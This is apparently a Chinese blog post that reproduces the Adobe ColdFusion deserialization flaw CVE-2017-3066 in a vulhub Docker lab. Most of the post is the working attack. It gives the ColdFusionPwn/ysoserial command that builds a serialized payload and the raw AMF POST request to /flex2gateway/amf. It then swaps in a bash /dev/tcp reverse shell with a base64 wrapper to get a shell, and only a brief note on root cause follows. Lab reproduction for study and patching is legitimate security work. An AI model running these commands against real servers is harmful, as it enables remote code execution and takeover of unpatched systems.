CVE-2017-3066
2019-07-26 本文已影响163人
3mi1e
Adobe ColdFusion 反序列化漏洞(CVE-2017-3066)
1.漏洞影响版本
Adobe ColdFusion (2016 release) Update 3及之前的版本,ColdFusion 11 Update 11及之前的版本,ColdFusion 10 Update 22及之前的版本。
2.漏洞危害
反序列化漏洞
3.漏洞POC
cd /root/vulhub/coldfusion/CVE-2017-3066 ////进入本次复现的vulhub目录
docker-compose up -d ////docker-compose搭建环境
靶机搭建
http://192.168.11.136:8500/CFIDE/administrator/index.cfm,密码输入vulhub
安装Adobe ColdFusion
使用kali生成POC,并且注意下载的ColdFusionPwn与ysoserial的名字,POC执行方法:
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-55f1e7c35c-1.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'touch /tmp/success' poc.ser
访问URL:http://192.168.11.136:8500/flex2gateway/amf
构造如下请求包:
POST /flex2gateway/amf HTTP/1.1
Host: 192.168.11.136:8500
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-amf
Content-Length: 2851
切记,因为编码问题,一定要通过BP的copy to file粘贴进POST data
POC
成功创建/tmp/success
success
将POC换成反弹shell
bash -i >& /dev/tcp/192.168.11.1/7777 0>&1
bash -c {echo,payload的basse64编码}|{base64,-d}|{bash,-i} ///绕过java机制
getshell
4.复盘
漏洞出现原因
个人感觉反序列化漏洞出现的根本原因是没有控制序列化的类型范围。
总结:
1.NotePad++与BP直接导入ser文件的编码不同。
2.vulhub是个从头开始,由浅入深的环境,一些前面讲到的需要自己去寻找,比如绕过java机制反弹shell。
